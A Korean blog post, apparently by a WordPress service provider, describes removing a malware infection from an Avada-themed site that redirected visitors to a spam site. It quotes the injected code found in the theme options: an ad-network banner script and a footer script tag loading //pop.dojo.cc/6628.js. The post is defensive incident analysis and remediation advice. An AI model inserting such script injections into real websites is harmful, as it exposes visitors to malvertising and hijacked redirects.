어제는 워드프레스 베스트셀링 테마인 아바다 테마가 설치된 워드프레스 사이트에서 멀웨어를 제거하는 작업을 수행했습니다. 사이트를 오랫동안 업데이트를 하지 않고 방치하다 악성코드에 감염되어 클라이언트께서 다른 작업자에게 작업을 맡겼지만 해결이 안 되었다고 하네요.
악성코드가 감염되면 악성코드를 제거하고 사이트 전체(워드프레스, 테마, 플러그인)를 최신 버전으로 업데이트해야 합니다. 그리고 보안 플러그인 등을 설치하고 기타 보안 조치를 취하여 보안을 강화해야 멀웨어에 재감염이 되지 않습니다.
아바다 테마가 설치된 워드프레스 사이트에서 멀웨어 (악성코드) 제거 작업
사이트에 접속하면 아래 그림과 같이 팝업이 표시되고 close 버튼이 표시되었습니다.
노란색 부분에 지저분한 광고가 표시되는데, 저는 애드블록이 활성화되어 광고가 표시되지는 않았습니다. 그리고 화면의 아무 곳을 클릭하면 moviesearch[.]org이라는 이상한 사이트로 리디렉션되었습니다.
이런 이상한 스팸 사이트로 이동하는 것은 전형적인 멀웨어 감염 증상입니다.
또한, 멀웨어에 감염되면 사이트가 속도가 현저히 느려질 수 있고, 스팸 팝업이나 리디렉션 이동이 간헐적으로 발생할 수 있습니다.
관리자로 로그인하면 멀웨어 감염 증상이 나타나지 않고 방문자들이 방문할 때에만 증상이 나타나는 경우도 많습니다. 이 때문에 관리자가 악성코드 감염 사실을 너무 늦게 인식하여 사이트를 복구할 수 있는 기회를 놓칠 수 있습니다.
악성코드에 감염될 경우 FTP/SFTP를 통해 서버에 접속하여 살펴보면 이상한 이름의 파일들이 생성되어 있을 수 있습니다.
또한, 악성코드가 DB에 주입되어 제거하는 것이 쉽지 않은 경우도 있습니다.
이번 건의 경우 사이트가 오랫동안 방치되면서 악성코드에 감염되었고, 클라께서 직접 악성코드에 감염된 파일들을 제거했지만 문제가 해결되지 않았습니다.
서버에 접속하여 악성코드가 감염된 파일들을 제거했지만 문제가 해결되지 않아서 DB를 체크해보니 아바다 테마의 테마 옵션을 통해 악성코드가 주입된 것을 확인할 수 있었습니다.
사이트에 접속하면 다음과 같은 코드로 된 팝업이 표시되었습니다.
<div id="banner-container" style="width:100%;margin:auto;text-align:center;float:none;overflow:hidden;display:scroll;position:fixed;bottom:10px;z-index:999;-webkit-transform:translateZ(0);">
<div style="margin-bottom: 10px;">
<a onclick="document.getElementById("banner-container").style.display = "none";" style="cursor:pointer;"><span style="vertical-align:middle; background: yellow; padding: 0px 11.3px 3px 11.3px; border: 3px solid red; color: red; font-size: 1.5em; font-weight: bold; border-radius: 100px;"> close </span></a>
</div>
<div style="text-align:center;display:block;max-width:300px;height:250px;overflow:hidden;margin:auto; border: 3px solid red; background: yellow;">
<script type="text/javascript">
atOptions = {
'key' : 'daca8c0c80a5b88fb143b67fb00143aa',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
</script>
<script type="text/javascript" src="//www.topcreativeformat.com/daca8c0c80a5b88fb143b67fb00143aa/invoke.js"></
script>
</script>
</div>아바다 테마의 푸터 영역에 다음과 같은 이상한 스크립트가 추가되어 있었습니다.
<script src="//pop.dojo.cc/6628.js"></script>하지만 예상과 달리 이 스크립트를 제거해도 증상이 사라지지 않았습니다. 조금 더 살펴보니 비슷한 악성코드 스크립트가 여러 군데 추가되어 있었습니다.
아바다, 뉴스페이퍼 등 Themeforest 테마들 일부는 워드프레스에서 제시하는 가이드라인을 제대로 준수하지 않아서 보안에 취약할 수 있습니다.
뉴스페이퍼 테마를 사용하는 사이트도 감염되는 사례가 지속적으로 보고되고 있습니다.
뉴스페이퍼 테마가 설치된 워드프레스 사이트의 멀웨어 치료
뉴스페이퍼(Newspaper)는 뉴스, 매거진, 웹진, 블로그 사이트 구축에 많이 사용되는 인기 워드프레스 테마 중 하나입니다. 하지만 작년 9월경에 뉴스페이퍼 테마에 보안 취약점이 존재하여 테마를
avada.tistory.com
참고로 악성코드 스캔에 Wordfence 플러그인이 많이 사용됩니다. 하지만 멀웨어에 감염된 상태에서 멀웨어 스캔을 하면 제대로 검색되지 않을 수 있습니다. 반드시 거의 완전히 제거한 후에 악성코드에 감염된 파일들이 남아 있는지를 체크하는 용도로 워드펜스 플러그인을 사용할 수 있습니다.
악성코드에 감염되면 이상한 사이트로 이동하는 등의 문제로 인해 사이트 이미지가 타격을 입을 수 있고 치료에 비용과 시간이 소요되므로 미리 예비하여 감염되지 않는 것이 최선입니다.
멀웨어 감염을 비롯한 워드프레스와 웹호스팅 문제로 어려움을 겪고 있는 경우 여기에서 서비스(유료)를 의뢰하실 수 있습니다.
참고
https://avada.tistory.com/2897
엘리멘터 무료 버전 vs. 프로 버전 비교
엘리멘터(Elmentor)는 500만 개가 넘는 사이트에 설치되어 사용되고 있는 인기 워드프레스 페이지 빌더 플러그인입니다. 엘리멘터는 무료 버전과 프로 버전으로 제공됩니다. Elementor 프로 버전에서
avada.tistory.com
https://avada.tistory.com/2335
워드프레스 GeneratePress 테마 라이선스 (+요금제)
워드프레스에는 정말 많은 테마가 있습니다. 테마 라이선스는 테마마다 조금씩 다릅니다. 아바다, 엔폴드, 뉴스페이퍼 등 테마포레스트 테마의 경우 동일한 라이선스가 적용됩니다(참고). Generat
avada.tistory.com
https://avada.tistory.com/3275
엘리멘터 프로 설치 사이트의 멀웨어 제거 작업
엘리멘터 프로가 설치된 워드프레스 사이트가 악성코드에 감염되어 이상한 사이트로 리디렉션되는 문제를 해결하는 작업을 맡았습니다. 워드프레스 사이트에 접속하면 아래와 같이 Loading... Ple
avada.tistory.com